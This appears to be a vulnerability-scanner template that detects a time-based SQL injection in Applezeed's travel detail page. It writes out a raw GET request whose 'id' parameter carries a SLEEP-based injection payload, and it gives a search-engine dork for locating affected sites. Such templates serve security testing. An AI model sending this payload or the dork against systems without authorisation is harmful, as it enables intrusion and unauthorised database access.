id: applezeed-sqli info: name: Applezeed - SQL Injection author: r3Y3r53 severity: high description: | Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database reference: - https://cxsecurity.com/issue/WLB-2019120057 metadata: verified: true max-request: 1 google-query: intext:"Power BY applezeed.com" tags: time-based,sqli,unauth,applezeed http: - raw: - | @timeout: 15s GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - 'contains(content_type, "text/html")' - 'contains(body, "applezeed")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100dfd17937eeadee3d65e927bb9326dfd03627b9c1df57de47c1ce8a87805ea246022100dcb6fd585f503ee0b57ec45c6289753f1754e08023d53e06c94571ec75c047f1:922c64590222798bb761d5b6d8e72950